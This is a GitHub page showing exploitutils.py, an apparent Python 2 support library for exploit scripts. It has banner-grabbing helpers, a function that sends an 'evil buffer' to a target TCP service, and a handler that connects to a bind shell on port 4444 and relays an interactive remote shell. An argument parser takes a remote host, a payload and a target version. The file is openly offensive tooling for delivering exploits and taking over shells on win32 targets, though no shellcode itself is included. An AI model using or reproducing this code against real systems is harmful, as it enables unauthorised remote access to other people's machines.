-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathexploitutils.py
More file actions
131 lines (119 loc) · 4.07 KB
/
exploitutils.py
File metadata and controls
131 lines (119 loc) · 4.07 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
import argparse
import random
import requests
import socket
import string
import subprocess
import os
import sys
import time
def print_bad(msg):
sys.stdout.write("\033[1;91;40m [-] %s\033[0;37;40m\n" % msg)
#return True
def print_good(msg):
sys.stdout.write("\033[1;92;40m [+] %s\033[0;37;40m\n" % msg)
#return True
def print_warning(msg):
sys.stdout.write("\033[1;93;40m [!] %s\033[0;37;40m\n" % msg)
#return True
def print_status(msg):
sys.stdout.write("\033[1;94;40m [*] %s\033[0;37;40m\n" % msg)
#return True
def randomstring(length):
return "".join(random.choice(string.ascii_lowercase) for i in range(length))
def handler( HOST, PAYLOAD ):
if PAYLOAD == 'win32bind' or PAYLOAD == 'win32prebind':
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
count = 1
while True:
try:
# Connect to target host
client.connect((HOST, 4444))
print_good("Got our shell!\n")
client.settimeout(1)
data = client.recv(1024)
sys.stdout.write(data)
sys.stdout.flush()
except socket.error:
if count == 10:
print_bad("Shell is not listening?")
exit()
count = count + 1
time.sleep(1)
continue
break
while True:
try:
data = client.recv(1024)
sys.stdout.write(data)
sys.stdout.flush()
except:
try:
client.sendall(raw_input(""))
client.sendall("\r\n")
except:
client.close()
print "Socket closed!"
exit()
def bannercheck( HOST, PORT ):
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(( HOST, PORT ))
data = s.recv(1024)
s.close()
return data
except Exception as error:
print error
return False
def bannercheckhttp( HOST, PORT ):
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(( HOST, PORT ))
s.send('GET / HTTP/1.1\r\nHost: %s\r\n\r\n' % HOST)
data = s.recv(1024)
s.close()
return data
except Exception as error:
print error
return False
def bannercheckhttps( HOST, PORT ):
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(( HOST, PORT ))
s.send('GET / HTTP/1.1\r\nHost: %s\r\n\r\n' % HOST)
data = s.recv(1024)
s.close()
return data
except Exception as error:
print error
return False
def tcpexploit( HOST, PORT, SPLOITSTRING ):
print_status("Connecting to %s on port %s" % ( HOST, PORT ))
try:
s=socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.connect(( HOST, PORT ))
s.recv( 1024 )
print_status("Sending evil buffer")
s.send( SPLOITSTRING )
s.close()
return True
except Exception as error:
print error
return False
def arguments():
parser = argparse.ArgumentParser(add_help=True,
epilog='Example: %s --rhost 192.168.56.101 --target 0 --payload \
win32bind' % sys.argv[0])
parser.add_argument('--rhost', dest='RHOST', help='Target IP / Hostname')
parser.add_argument('--port', dest='PORT', help='Target service port')
parser.add_argument('--payload', dest='PAYLOAD', help='Shellcode to use')
parser.add_argument('--args', dest='PARGS', nargs=argparse.REMAINDER)
parser.add_argument('--force', action='store_true', help='Ignore all checks\
and send the exploit')
parser.add_argument('--check', action='store_true', help='Do not exploit\
vulnerable target')
parser.add_argument('--targets', action='store_true', help='Print available\
targets')
parser.add_argument('--target', dest='TARGET', help='Set the target \
version')
return parser